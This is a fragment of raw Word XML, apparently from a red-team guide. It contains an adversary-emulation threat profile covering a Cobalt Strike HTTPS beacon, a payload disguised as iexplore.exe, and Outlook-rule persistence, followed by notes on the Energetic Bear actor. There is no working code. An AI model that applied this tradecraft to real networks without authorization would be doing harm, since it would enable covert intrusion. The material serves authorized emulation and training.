          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2272"/>
        <w:gridCol w:w="6754"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="17EA52EB" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66259E54" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C37E8C9" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="3097E0C4" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="137BCA6E" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F119543" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>General mid-tiered threat that uses common offensive tools and techniques.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="373B02F4" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D96863C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Goal and Intent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22A88D21" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="1E621EAD" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DED2DEB" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Key IOCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F078410" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cobalt Strike HTTPS beacon on TCP 443, Payload: c:\programdata\microsoft\iexplore.exe, Timestamp: 7/13/2009 10:04 PM, MD5: a7705501c5e216b56cf49dcf540184d0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="719FFD16" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="353F838D" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>C2 Overview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A6949C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>HTTPS on port 443 Cobalt Strike Beacon with a five-minute callback time. Calling directly to threat-owned domains.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="3875782D" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21BD1BB9" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>TTPs (Enumeration, Delivery, Lateral Movement, Privilege Escalation, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EDD3CE1" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Assumed Breach Model, no initial delivery via exploitation. POST-exploitation via Cobalt Strike commands. Enumeration and lateral movement via Cobalt Strike and native Windows commands. Privilege escalation limited and determined </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>POST-exploitation</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="21EFBB42" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D903AAE" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7127E100" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Assumed Breach Model, no exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="460ED23C" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04EF8901" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74679D6A" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>User-level persistence using Microsoft Outlook rule triggered by specific email.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41A422D6" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>THREAT PROFILE USAGE</w:t>
      </w:r>
      <w:hyperlink r:id="rId171" w:anchor="threat-profile-usage" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50D939D1" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Threat profiles typically support the engagement story and are used to describe the technical aspects of a single C2 channel. A single threat profile is used for each C2 channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BEB1B" w14:textId="32061452" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FEE3C3E" wp14:editId="65B02847">
            <wp:extent cx="5731510" cy="31496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731510" cy="3149600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC73F07" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>HIGHLIGHTS FROM ENERGETIC BEAR THREAT ACTOR</w:t>
      </w:r>
      <w:hyperlink r:id="rId173" w:anchor="highlights-from-energetic-bear-threat-actor" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78C9CFAC" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Starting in 2010 and ending in 2014, Energetic Bear / Dragonfly / Crouching Yeti malware attacked numerous computers to collect information on industrial control systems in the United States and Europe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7130FB7B" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Spread out over time and thus difficult to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>detect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F2CA394" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The primary goal was to collect information that impacted the energy and pharmaceutical </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>industries</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E8C5561" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Possibly nation-state </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>supported</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18B46ABE" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Phishing, watering hole attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6FC247" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Known exploits were used (PDF, Java, IE, Word)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467D1408" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Compromised ICS web servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47764282" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
